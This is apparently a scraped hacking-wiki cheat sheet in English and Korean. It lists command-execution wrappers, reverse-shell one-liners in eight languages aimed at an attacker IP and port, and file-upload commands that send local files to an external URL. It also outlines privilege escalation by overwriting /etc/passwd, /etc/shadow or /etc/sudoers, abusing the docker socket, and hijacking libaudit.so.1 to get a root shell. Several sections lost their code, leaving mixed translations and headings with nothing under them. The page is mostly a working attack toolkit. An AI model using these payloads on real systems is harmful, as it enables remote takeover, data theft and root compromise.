Payloads to execute
Bash
C
Payloads to Execute
Shell Commands
To execute shell commands, you can use the following payloads:
Bash:
bash -c "<command>"
Sh:
sh -c "<command>"
Python:
python -c "<command>"
Perl:
perl -e "<command>"
Ruby:
ruby -e "<command>"
PHP:
php -r "<command>"
Node.js:
node -e "<command>"
Java:
java -cp "<command>"
Replace <command>
with the desired shell command you want to execute.
Reverse Shells
To establish a reverse shell connection, you can use the following payloads:
Bash:
bash -i >& /dev/tcp/<attacker-ip>/<attacker-port> 0>&1
Netcat:
nc -e /bin/sh <attacker-ip> <attacker-port>
Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-ip>",<attacker-port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl:
perl -e 'use Socket;$i="<attacker-ip>";$p=<attacker-port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby:
ruby -rsocket -e'f=TCPSocket.open("<attacker-ip>",<attacker-port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
PHP:
php -r '$sock=fsockopen("<attacker-ip>",<attacker-port>);exec("/bin/sh -i <&3 >&3 2>&3");'
Node.js:
require('child_process').exec('nc -e /bin/sh <attacker-ip> <attacker-port>')
Java:
r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<attacker-ip>/<attacker-port>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor()
Replace <attacker-ip>
with the IP address of your machine and <attacker-port>
with the desired port for the reverse shell connection.
File Upload
To upload a file, you can use the following payloads:
Curl:
curl -F "file=@<local-file-path>" <upload-url>
Wget:
wget --post-file=<local-file-path> <upload-url>
Netcat:
nc <upload-url> < <local-file-path>
Python:
python -c 'import requests; files = {"file": open("<local-file-path>", "rb")}; r = requests.post("<upload-url>", files=files)'
Perl:
perl -e 'use LWP::UserAgent; $ua = LWP::UserAgent->new; $ua->post("<upload-url>", Content_Type => "form-data", Content => [file => "<local-file-path>"])'
Ruby:
ruby -rnet/http -e 'Net::HTTP.post_form(URI("<upload-url>"), "file" => File.open("<local-file-path>"))'
PHP:
php -r '$c = curl_init(); curl_setopt($c, CURLOPT_URL, "<upload-url>"); curl_setopt($c, CURLOPT_POST, true); curl_setopt($c, CURLOPT_POSTFIELDS, array("file" => "@<local-file-path>")); curl_exec($c); curl_close($c);'
Node.js:
const fs = require('fs'); const request = require('request'); const formData = { file: fs.createReadStream('<local-file-path>') }; request.post({ url: '<upload-url>', formData: formData }, function(err, res, body) { console.log(body); });
Java:
import java.io.File; import org.apache.commons.httpclient.HttpClient; import org.apache.commons.httpclient.methods.PostMethod; import org.apache.commons.httpclient.methods.multipart.FilePart; import org.apache.commons.httpclient.methods.multipart.MultipartRequestEntity; import org.apache.commons.httpclient.methods.multipart.Part; HttpClient client = new HttpClient(); PostMethod post = new PostMethod("<upload-url>"); FilePart filePart = new FilePart("file", new File("<local-file-path>")); Part[] parts = { filePart }; post.setRequestEntity(new MultipartRequestEntity(parts, post.getParams())); client.executeMethod(post);
Replace <local-file-path>
with the path to the file you want to upload and <upload-url>
with the URL where you want to upload the file.
권한 상승을 위해 파일 덮어쓰기
일반적인 파일들
_/etc/passwd_에 비밀번호가 있는 사용자 추가
/etc/shadow 내에서 비밀번호 변경
_/etc/sudoers_에 사용자 추가
일반적으로 /run/docker.sock 또는 _/var/run/docker.sock_에 위치한 도커 소켓을 통해 도커 남용
라이브러리 덮어쓰기
일부 이진 파일에서 사용되는 라이브러리를 확인하십시오. 이 경우 /bin/su
를 사용합니다:
이 경우에는 /lib/x86_64-linux-gnu/libaudit.so.1
을 가장하는 것을 시도해보겠습니다.
그래서 su
이진 파일에서 이 라이브러리에서 사용되는 함수를 확인하세요:
심볼 audit_open
, audit_log_acct_message
, audit_log_acct_message
및 audit_fd
는 아마도 libaudit.so.1 라이브러리에서 가져온 것입니다. 악성 공유 라이브러리에 의해 libaudit.so.1이 덮어쓰여지므로 이러한 심볼은 새로운 공유 라이브러리에 있어야 합니다. 그렇지 않으면 프로그램은 심볼을 찾을 수 없어 종료될 것입니다.
지금은 **/bin/su
**를 호출하기만 하면 root로 쉘을 얻을 수 있습니다.
스크립트
루트가 무언가를 실행하도록 할 수 있나요?
www-data를 sudoers로 추가
루트 비밀번호 변경
To change the root password, you can use the following command:
루트 비밀번호를 변경하려면 다음 명령을 사용할 수 있습니다:
You will be prompted to enter the new password twice. After successfully changing the password, you can log in as root using the new password.
/etc/passwd에 새로운 root 사용자 추가하기
To add a new root user to the /etc/passwd
file, you can follow these steps:
Open the
/etc/passwd
file using a text editor.Locate the line that starts with
root
and copy it.Paste the copied line at the end of the file.
Modify the username to a unique name for the new root user.
Change the user ID (UID) to
0
, which represents the root user.Change the group ID (GID) to
0
, which represents the root group.Update the home directory and shell fields if necessary.
Save the changes and exit the text editor.
After completing these steps, you will have successfully added a new root user to the /etc/passwd
file.
Last updated